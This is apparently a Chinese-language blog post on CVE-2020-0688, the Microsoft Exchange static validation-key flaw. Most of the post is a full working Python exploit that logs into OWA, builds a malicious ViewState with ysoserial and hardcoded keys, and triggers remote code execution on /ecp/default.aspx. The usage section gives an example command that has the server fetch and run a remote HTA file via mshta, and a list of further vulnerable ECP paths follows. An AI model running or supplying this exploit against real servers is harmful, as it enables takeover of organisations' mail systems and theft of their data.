CVE-2020-0688-微软Exchange服务器静态密钥缺陷导致远程代码EXP

• 2020 年 3 月 6 日
• 筆記

概述

在2020年2月发布的最新微软月度补丁程序中，Microsoft发布了一个重要的补丁程序，以修复Microsoft Exchange服务器中的远程代码执行漏洞。该漏洞由一位匿名研究人员报告给我们，影响Microsoft Exchange服务器的所有受支持版本，在2月的补丁中实现修复。

视频地址：https://youtu.be/7d_HoQ0LVy8

最初，Microsoft表示该漏洞是由于内存损坏漏洞引起的，并且可以通过将特制的电子邮件发送到易受攻击的Exchange服务器的方式利用这一漏洞。此后，Microsoft已经将Write-up的内容进行修改，目前表示该漏洞是由于Exchange Server在安装时未能正确创建唯一的加密密钥所导致的。

漏洞利用：

# encoding: UTF-8  import requests  import readline  import argparse  import re  import sys  import os  import urllib3  from urllib.parse import urlparse  from urllib.parse import quote  urllib3.disable_warnings()    ysoserial_path = os.path.abspath(os.path.dirname(__file__))+"/ysoserial-1.32/"  session = requests.Session()    def get_value(url, user, pwd):      print("[*] Tring to login owa...")      tmp = urlparse(url)      base_url = "{}://{}".format(tmp.scheme, tmp.netloc)      paramsPost = {"password": ""+pwd+"", "isUtf8": "1", "passwordText": "", "trusted": "4",                  "destination": ""+url+"", "flags": "4", "forcedownlevel": "0", "username": ""+user+""}      headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Upgrade-Insecure-Requests": "1",              "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0", "Connection": "close", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PrivateComputer=true; PBack=0"}      cookies = {"PBack": "0", "PrivateComputer": "true"}      login_url = base_url + '/owa/auth.owa'      print("[+] Login url: {}".format(login_url))      try:          login = session.post(login_url, data=paramsPost,                            headers=headers, verify=False, timeout=30)          print("[*] Status code: %i" % login.status_code)          if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text:              print("[!] Login Incorrect, please try again with a different account..")              # sys.exit(1)          #print(str(response.text))      except Exception as e:          print("[!] login error , error: {}".format(e))          sys.exit(1)      print("[+] Login successfully! ")      try:          print("[*] Tring to get __VIEWSTATEGENERATOR...")          target_url = "{}/ecp/default.aspx".format(base_url)          new_response = session.get(target_url, verify=False, timeout=15)          view = re.compile(              'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0]          print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view))      except:          view = "B97B4E27"          print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view))      try:          print("[*] Tring to get ASP.NET_SessionId....")          key = session.cookies['ASP.NET_SessionId']          print("[+] Done!  ASP.NET_SessionId: {}".format(key))      except Exception as e:          key = None          print("[!] Get ASP.NET_SessionId error, error: {} n[*] Exit..".format(e))      return view, key, base_url    def ysoserial(cmd):      cmd = ysoserial_path+cmd      r = os.popen(cmd)      res = r.readlines()      return res[-1]    def main():      parser = argparse.ArgumentParser()      parser.add_argument("-s", "--server", required=True, help="ECP Server URL Example: http://ip/owa")      parser.add_argument("-u", "--user", required=True, help="login account Example: domain\user")      parser.add_argument("-p", "--password", required=True, help="Password")      parser.add_argument("-c", "--cmd", help="Command u want to execute", required=True)      parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true',default=False)      args = parser.parse_args()      url = args.server      print("[*] Start to exploit..")      user = args.user      pwd = args.password      command = args.cmd      view, key, base_url = get_value(url, user, pwd)      if key is None:          key = 'test'          sys.exit(1)      ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy """.format(command,view,key)      if args.encrypt:          re_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted'      else:          re_payload = ex_payload + " --isdebug"      print("n"+re_payload)      out_payload = ysoserial(re_payload)      if args.encrypt:          final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload))      else:          final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload))      print("n[+] Exp url: {}".format(final_exp))      print("n[*] Auto trigger payload..")      status = session.get(final_exp,verify=False,timeout=15)      if status.status_code==500:          print("[*] Status code: %i, Maybe success!" % status.status_code)    if __name__ == "__main__":      main()

利用说明：

python3 CVE-2020-0688_EXP.py -h    usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e]    optional arguments:    -h, --help            show this help message and exit    -s SERVER, --server ECP Server URL Example: http://ip/owa    -u USER, --user USER  login account Example: domainuser    -p PASSWORD, --password PASSWORD    -c CMD, --cmd CMD     Command u want to execute    -e, --encrypt         Encrypt the payload    例    python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u [email protected] -p passwd -c "mshta http://1.1.1.1/test.hta"

其他可用路径：

/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27  /ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E  /ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E  /ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0  /ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0  /ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0  /ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B  /ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8  /ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0  /ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321  /ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055  /ecp/Customize/SentItems.aspx?showhelp=false& __VIEWSTATEGENERATOR=4466B13F  /ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA  /ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0  /ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0  /ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08  /ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1__VIEWSTATEGENERATOR=FD338EE0  /ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF

更新修复

您可以访问所有受支持的Microsoft Exchange Server版本的安全更新说明，并从下表中下载它们：